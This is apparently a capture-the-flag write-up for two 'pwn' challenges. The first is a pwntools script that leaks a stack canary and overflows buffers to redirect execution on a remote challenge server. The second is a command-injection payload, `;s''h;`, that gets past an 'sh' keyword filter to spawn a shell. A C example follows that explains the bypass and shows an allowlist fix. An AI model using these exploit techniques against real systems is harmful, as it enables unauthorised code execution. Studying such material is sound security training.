das
pwn1
```python
from pwn import *

context(arch='amd64', log_level='debug', os='linux')
#p = process("./GuestBook")
p = remote("node4.buuoj.cn", 27600)

# Fill the name buffer up to the canary and overwrite its low NUL byte with '^',
# so that echoing the name runs on into the canary and leaks its upper 7 bytes.
payload = b'a' * 0x18 + b'^'
p.sendafter("Please input your name: ", payload)
p.recvuntil("^")
canary = p.recv(7)
print(canary)

p.sendlineafter("(MAX 4): ", b'3')
sleep(1)

# First message: 0xA8 bytes of padding followed by the address 0x4012c3.
payload = b'a' * 0xA8 + p64(0x4012C3)
# attach(p,
# '''
# b *0x40147d
# c
# '''
# )
p.sendline(payload)

# Second message: 0x78 bytes of padding, then b'a' and the 7 leaked canary bytes.
payload = b'a' * (0xA0 - 0x20 - 8) + b'a' + canary
p.sendline(payload)

# Third message: padding only.
payload = b'a' * (0xA0 - 0x40 - 8)
p.sendline(payload)

p.interactive()
```
pwn2
The PING command has an injection flaw: underneath it is a call to system(). Use two `;` to cut off the text before and after the injected command, then use two single quotes to get past the string check: the filter looks for the literal `sh`, but the shell removes the empty quoted string, so `s''h` is executed as `sh`.

```
;s''h;
```
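To show why the payload works and what a fixed check looks like, here is an added C example that is not part of the writeup or the challenge binary. It assumes a hypothetical filter that rejects the substring `sh` (the writeup only says "string check"), a command line of the form `ping -c 1 <host>`, and the payload above as constructed input; nothing is actually executed, the shell's quote removal is simulated to display the command the shell would run.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed sample input: the payload from the writeup. */
static const char *PAYLOAD = ";s''h;";

/* Hypothetical filter of the kind the writeup describes: reject the literal
 * substring "sh" before the input reaches system(). Returns 1 when blocked. */
int naive_filter(const char *input)
{
    return strstr(input, "sh") != NULL;
}

/* What the binary effectively does ("essentially a system function"): the
 * user string is spliced into a ping command line. Only builds the string in
 * buf; nothing is executed. Returns 1 on success, 0 if it did not fit. */
int build_ping_command(const char *host, char *buf, size_t len)
{
    int n = snprintf(buf, len, "ping -c 1 %s", host);
    return n >= 0 && (size_t)n < len;
}

/* POSIX-shell quote removal for the simple cases (single and double quotes,
 * no backslash escapes): this is what the shell sees after the filter has
 * already been satisfied, so s''h becomes sh. Returns out. */
char *shell_dequote(const char *cmd, char *out, size_t len)
{
    size_t o = 0;
    char q = 0;                         /* current quote character, or 0 */
    for (const char *p = cmd; *p && o + 1 < len; p++) {
        if (q) {
            if (*p == q) q = 0;         /* closing quote: dropped */
            else out[o++] = *p;
        } else if (*p == '\'' || *p == '"') {
            q = *p;                     /* opening quote: dropped */
        } else {
            out[o++] = *p;
        }
    }
    out[o] = '\0';
    return out;
}

/* Hardened check: ping only needs a hostname or IP literal, so allow nothing
 * but [A-Za-z0-9.:-]. Metacharacters, spaces and quotes are rejected outright
 * instead of looking for known-bad words. Returns 1 when blocked. */
int strict_filter(const char *input)
{
    if (*input == '\0') return 1;
    for (const char *p = input; *p; p++) {
        if (!isalnum((unsigned char)*p) && *p != '.' && *p != ':' && *p != '-')
            return 1;
    }
    return 0;
}

int main(void)
{
    char cmd[128], seen[128];
    printf("naive filter blocks %s? %d\n", PAYLOAD, naive_filter(PAYLOAD));
    build_ping_command(PAYLOAD, cmd, sizeof cmd);
    printf("system() receives : %s\n", cmd);
    printf("shell executes    : %s\n", shell_dequote(cmd, seen, sizeof seen));
    printf("strict filter blocks? %d\n", strict_filter(PAYLOAD));
    return 0;
}
```

The naive filter passes `;s''h;` because the bytes `s` and `h` are never adjacent in the raw input, yet after quote removal the shell runs `ping -c 1`, then `sh`, then an empty command. The allowlist version blocks it because `;` and `'` are not hostname characters; the more robust fix is to avoid system() entirely and execve() ping with the host as a separate argv element.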